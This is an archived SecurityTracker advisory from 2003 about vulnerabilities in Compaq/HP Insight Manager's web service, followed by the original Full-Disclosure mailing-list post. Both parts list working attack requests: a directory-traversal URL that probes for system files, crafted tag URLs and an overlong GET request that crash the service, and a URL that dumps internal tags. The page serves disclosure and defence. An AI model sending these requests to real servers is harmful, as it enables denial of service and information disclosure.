SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   HPE Systems Insight Manager Vendors:   HPE
Compaq Insight Manager Discloses File Existence to Remote Users and May Allow Denial of Service Attacks
SecurityTracker Alert ID:  1006453
SecurityTracker URL:  http://securitytracker.com/id/1006453
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 3 2003
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in Compaq's Insight Manager. A remote user can determine if a specified file on the system exists or not. A remote user can also cause the service to crash.

It is reported that a remote user can request the following type of URL to determine whether a specified file exists on the server:

http://[target]:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It is also reported that several URLs can trigger a stack overflow. The report did not indicate whether these overflows could result in arbitrary code execution. The URLs include:

http://[target]:2301/<!.StringRedirecturl>
http://[target]:2301/<!>
http://[target]:2301/survey/<!>
http://[target]:2301/<!.StringHttpRequest=Url>
http://[target]:2301/survey/<!.StringHttpRequest=Url>
http://[target]:2301/<!.StringIsapiECB=lpszPathInfo>
http://[target]:2301/<!.ObjectIsapiECB>

A buffer overflow can also be triggered with the following HTTP request:

GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0

A remote user can also view a 'TAG' list by requesting the following URL:

http://[target]:2301/<!.TableDisplayTags>

The report indicates that the above listed URLs can be used via the HTTPS port (tcp 2381), as well.

The vendor has reportedly been notified.

Impact:   A remote user can determine whether specified files exist on the server. A remote user can cause the web service to crash [Editor's note: It is not clear whether the service will automatically restart or if it requires a manual restart].
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/ (Links to External Site)
Cause:   Access control error, Boundary error, State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Compaq/HP WBEM stuff (fwd)


Compaq Insight Manager - Web-Based Management

Exploitable w3 server?
I don't know and i don't care...

Regards, bashis

> Subject: Compaq/HP WBEM stuff
> To: security-alert@hp.com
> Date: Sun, 9 Mar 2003 22:56:04 +0100 (CET)
> 
> Compaq Web-Based Management stuff.
> 
> All versions of WBEM seems to be affected..
> (These 'tags' works also with 'secure' HTTPS tcp/2381.)
> 
> http://<IP>:2301/<!.StringRedirecturl>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/<!>       
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/survey/<!>
> Stack overflow (0xc00000fd), Address: 0x10039869
> 
> http://<IP>:2301/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/survey/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x10039869
> 
> http://<IP>:2301/<!.StringIsapiECB=lpszPathInfo>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/<!.ObjectIsapiECB>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
> Access violation (0xc0000005), Address: 0x100368a5
> 
> Check file existens. (with a nice 'input box';)
> http://<IP>:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
> 
> ..... plus many more tags.
> 
> Get a whole 'TAG' list with:    
> http://<IP>:2301/<!.TableDisplayTags>
> 
> Regards, bashis
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC